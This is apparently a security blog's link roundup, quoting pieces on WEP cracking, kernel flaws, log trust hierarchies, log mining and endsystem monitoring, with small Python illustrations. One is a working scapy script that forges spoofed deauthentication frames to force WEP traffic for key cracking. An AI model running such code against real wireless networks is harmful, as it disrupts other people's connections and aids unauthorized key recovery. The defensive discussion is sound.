Why won’t this cold go away?
Here is the list:
aircrack-ptw – Fast WEP Cracking Tool for Wireless Hacking – Still using WEP? Want to reconsider that?
The aircrack team were able to extend Klein’s attack and optimize it for usage against WEP. Using this version, it is possible to recover a 104-bit WEP key with probability 50% using just 40,000 captured packets. For 60,000 available data packets, the success probability is about 80%, and for 85,000 data packets about 95%. Using active techniques like deauth and ARP re-injection, 40,000 packets can be captured in less than one minute under good conditions. The actual computation takes about 3 seconds and 3 MB of main memory on a Pentium-M 1.7 GHz and can additionally be optimized for devices with slower CPUs. The same attack works against 40-bit keys too, with an even higher success probability.
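For the curious, the “active techniques” mentioned above amount to injecting frames that force the network to generate fresh encrypted traffic. Here’s a minimal sketch of the deauth idea using Python’s scapy (my illustration, not the aircrack-ptw tool itself; the interface name and MAC addresses are placeholders):

```python
# Hedged sketch: forging a deauthentication frame to stimulate WEP traffic.
# Assumes a monitor-mode interface ("wlan0mon") and placeholder MACs;
# this illustrates the idea behind the "active techniques", not aircrack-ptw.
from scapy.all import RadioTap, Dot11, Dot11Deauth, sendp

BSSID = "00:11:22:33:44:55"   # hypothetical access point MAC
CLIENT = "66:77:88:99:aa:bb"  # hypothetical associated client MAC

# A deauth addressed to the client, spoofed from the AP: the client
# reconnects and generates new encrypted packets (fresh IVs) to capture.
frame = RadioTap() / Dot11(addr1=CLIENT, addr2=BSSID, addr3=BSSID) / Dot11Deauth(reason=7)
sendp(frame, iface="wlan0mon", count=64, inter=0.1)
```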
No Ring Untarnished – Interesting article on kernel vulnerabilities.
Kernel vulnerabilities themselves are nothing new, of course. The exploitation of local kernel flaws has been a popular pastime for many researchers and hackers over the years, and in many cases these flaws were shown to be exploited just as reliably as a local flaw in userland software. However, being local to the system has its advantages; the level of interactivity with the system and the data that is available make for more reliable and/or predictable results. We have seen more than a fair share of remote kernel flaws over the years as well, some of which were leveraged in historical attacks (such as the Teardrop denial of service attack).
Some logging notes – Michael mentions on his blog that he doesn’t feel he performs enough logging. From the comments it’s easy to tell where Anton and I stand on this practice 🙂
My own logging? At home, I don’t do enough. At my last job, we did logging, but didn’t use it enough, and probably didn’t use it properly. At my current job, we don’t do enough logging at all.
Log Trustworthiness Hierarchy – I like this post. One thing I’d like to see is how this hierarchy would be affected by ‘trusted’ systems that aren’t tuned to remove false positives, aren’t continuously updated for vulnerabilities, etc. (A rough sketch of the hierarchy as data follows the quoted list below.)
So, do you trust your logs to accurately depict what happened on the system or network? Which logs do you trust the most? How do we increase this trust?
My first draft of such a trust hierarchy follows (from low trust to high trust):
Compromised system logs (mostly pure distilled crap :-), but might contain bits that attacker missed/ignored)
Desktop / laptop OS and application logs (possibly changed by users, legitimate system owners, etc)
All logs from other systems where ‘root’/Admin access is not controlled (e.g. test servers, etc)
Unix application logs (file-based)
Local Windows application logs
Local Unix OS syslogs
Unix kernel audit logs, process accounting records
Local Windows server OS logs (a little harder to change)
Database logs (more trusted since DBA cannot touch them, while ‘root’ can)
Other security appliance logs (located on security appliances)
Various systems logs centralized to a syslog server
Network device and firewall logs (centralized to syslog server)
Logs centralized to a log management system via a real-time feed (obviously, transport encryption adds even more trust)
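To tie this back to my comment above, here’s a rough sketch of how you might encode such a hierarchy as data for automated triage. The tier names and numeric scores below are my own invented placeholders, not Anton’s:

```python
# Hedged sketch: ranking log sources per the trust hierarchy above.
# The tier names and numeric scores are invented placeholders.
TRUST_TIERS = {
    "compromised_system": 0,
    "desktop_os": 1,
    "uncontrolled_root_server": 2,
    "unix_app_file": 3,
    "windows_app_local": 4,
    "unix_syslog_local": 5,
    "unix_kernel_audit": 6,
    "windows_server_local": 7,
    "database": 8,
    "security_appliance": 9,
    "centralized_syslog": 10,
    "centralized_network_fw": 11,
    "log_mgmt_realtime_feed": 12,
}

def more_trusted(source_a: str, source_b: str) -> str:
    """Return whichever source sits higher in the hierarchy."""
    return max(source_a, source_b, key=TRUST_TIERS.__getitem__)

print(more_trusted("database", "desktop_os"))  # -> database
```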
Seek and Destroy: Enhancing America’s Digital First Strike Capabilities – I tend to believe that these capabilities are already in place or are currently in development.
What if the cyber attacks went beyond military targets and focused on civilian infrastructure? Would we look at this any differently than a physical attack on our infrastructure? Given our reliance on digital technology, is there really a difference?
And now for some security papers:
Forensic Analysis of a SQL Server 2005 Database Server
Understanding the Importance of and Implementing Internal Security Measures
Tuning an IDS/IPS From The Ground UP
OS and Application Fingerprinting Techniques
Another Presentation: FINAL Full Log Mining Slides – Thanks to Anton for posting another one of his excellent presentations.
Today I am happy to release what I consider to be my most interesting old presentation – a full slide deck on log mining. It covers a few years of my research into using simple data mining techniques to analyze logs stored in a relational database. It even comes with examples of real intrusions caught by my algorithms as well as tips on reproducing my results in your environment.
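To give a flavor of what “simple data mining techniques” against a log database can look like, here’s a toy sketch of rare-event detection in Python with sqlite3. The table name and schema are invented for illustration and may not match the deck’s actual algorithms:

```python
# Hedged sketch: "rare event" log mining against a relational store.
# The logs(event_type, msg, ts) schema is invented for illustration;
# message types that almost never occur are often the interesting ones.
import sqlite3

conn = sqlite3.connect("logs.db")
rare = conn.execute(
    """
    SELECT event_type, COUNT(*) AS n
    FROM logs
    GROUP BY event_type
    HAVING n <= 5          -- event types seen almost never
    ORDER BY n ASC
    """
).fetchall()

for event_type, count in rare:
    print(f"rare event type: {event_type} (seen {count} times)")
```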
NSA writes more potent malware than hacker – Hmm…this kind of goes back to my first strike point above 🙂
A project aimed at developing defences against malware that attacks unpatched vulnerabilities involved tests on samples developed by the NSA.
The ultra-secretive US spy agency supplied network testing firm Iometrix with eight worms as part of its plans to develop what it describes as the industry’s first Zero-day Attack Test Platform.
Richard Dagnell, VP of sales and marketing at Iometrix, said the six month project also featured tests involving two worm samples developed by a convicted hacker. The potency of the malware supplied by the NSA far exceeded that created by the hacker.
A Waste of Time – Yikes…not exactly a glowing review.
It’s just wrong when a company like Cisco charges an outrageous amount of money for a class that doesn’t do anything. I’ve been to other classes that were either free or less than $200 for 2 days that I gained much more from. After the class was finished we filled out a class evaluation, and I made sure to let it be known that I was unhappy. I was nice and constructive with my criticism. One of the questions was “Based on your experience in this class would you take another Cisco Authorized Training Class?” My answer was a resounding “NO!”. This is my first CAT class and I’m sure that many of them are very well done, but this isn’t one of them.
Congratulations Brian Granier! – I had the pleasure of attending the graduation ceremony while at SANS 2007 in Las Vegas. Congrats Brian!
Our handler Brian Granier this week became the second student to graduate from the SANS Technology Institute!
Microsoft’s Anemone Project – This was the first I’d heard of this initiative. It’s a great idea for reading traffic prior to and after encryption.
Ubiquitous network monitoring using endsystems is fundamentally different from other edge-based monitoring: the goal is to passively record summaries of every flow on the network rather than to collect availability and performance statistics or actively probe the network…
It also provides a far more detailed view of traffic because endsystems can associate network activity with host context such as the application and user that sent a packet. This approach restores much of the lost visibility and enables new applications such as network auditing, better data centre management, capacity planning, network forensics, and anomaly detection.
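To make that last point concrete, here’s a minimal sketch (my illustration, not Anemone’s actual code) of how an endsystem can attach application and user context to a flow, using Python’s psutil:

```python
# Hedged sketch: endsystem flow summaries with host context, in the
# spirit of Anemone (not its actual implementation). Requires psutil.
import psutil

for conn in psutil.net_connections(kind="inet"):
    if not conn.raddr or conn.pid is None:
        continue  # skip listening sockets and flows with no known owner
    try:
        proc = psutil.Process(conn.pid)
        app, user = proc.name(), proc.username()
    except (psutil.NoSuchProcess, psutil.AccessDenied):
        continue  # process exited (or is off-limits) between snapshot and lookup
    # The host context (application name, user) is exactly what an
    # in-network monitor cannot attach to a flow record.
    print(
        f"{conn.laddr.ip}:{conn.laddr.port} -> {conn.raddr.ip}:{conn.raddr.port}",
        f"app={app} user={user}",
    )
```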